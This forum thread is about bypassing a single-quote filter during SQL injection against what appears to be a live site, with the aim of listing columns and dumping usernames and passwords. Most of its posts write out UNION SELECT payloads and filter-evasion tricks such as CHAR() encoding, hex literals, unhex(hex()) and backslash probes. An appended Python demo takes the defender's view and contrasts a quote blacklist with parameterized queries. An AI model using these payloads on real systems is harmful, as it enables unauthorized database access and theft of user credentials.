
SQLi with character filters - how to


ghost

Hey guys. How do I proceed with SQLi when there seems to be some sort of character filter?

Whenever I use ', for example, I get an error. That becomes an issue when I try something like:

UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'--

I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.

Any ideas? :ninja:


spyware

It's char(12,34,45,56).

Not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.


ghost

Thanks for the tips, guys, but still no results.

I tried these inputs:

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))--

I've also tried substituting ='users' and 'users' for CHAR(xxx). No cigar.

It is strange that the first one doesn't work, because if I try something like:

union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users--

it works... so it shouldn't be a problem with CONCAT.

Any more ideas?


Tucak

It should be something like WHERE table_name=char(1,2,3,4)


ghost

Have you tried the unhex(hex()) method - that always seems to work for me.

And it's also worth adding a \ character before your single quotes to see if they're still using addslashes or something equally pathetic.
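As an added example that is not part of the thread, the following Python/sqlite3 sketch shows the defender's side of what Tucak's char(1,2,3,4) and the quote filter in the first post illustrate: a blacklist that rejects the quote character does nothing about a string spelled out with char(), whereas a bound parameter is never parsed as SQL at all. The schema, table names and inputs are constructed for the demo.

```python
import sqlite3

# Constructed demo schema (not from the thread): a public products table and
# a users table the application never means to expose.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        CREATE TABLE users (id INTEGER, name TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'alice', 'secret');
    """)
    return db

def is_blocked(value):
    # The kind of blacklist the thread runs into: any single quote is rejected.
    return "'" in value

def lookup_vulnerable(db, product_id):
    # Filter, then concatenate straight into the statement. The filter only
    # sees the quote character; char(...) yields the same string without it.
    if is_blocked(product_id):
        raise ValueError("forbidden character")
    sql = "SELECT id, name FROM products WHERE id = " + product_id
    return db.execute(sql).fetchall()

def lookup_safe(db, product_id):
    # Bound parameter: the driver passes the value as data, never as SQL text,
    # so no character filter is needed and no encoding changes the outcome.
    return db.execute(
        "SELECT id, name FROM products WHERE id = ?", (product_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    quoted = "1 UNION ALL SELECT name, pass FROM users WHERE name = 'alice'"
    # SQLite's char(97,108,105,99,101) evaluates to 'alice', as MySQL's CHAR() would.
    encoded = "1 UNION ALL SELECT name, pass FROM users WHERE name = char(97,108,105,99,101)"
    print("blacklist catches quoted input:", is_blocked(quoted))
    print("blacklist misses char() input:", is_blocked(encoded))
    print("vulnerable lookup:", lookup_vulnerable(db, encoded))
    print("parameterized lookup:", lookup_safe(db, encoded))
    print("parameterized lookup, normal input:", lookup_safe(db, "1"))
```

The parameterized lookup still works for an ordinary id because SQLite applies the column's numeric affinity to the bound value, while the injected text is compared as a whole string and matches nothing.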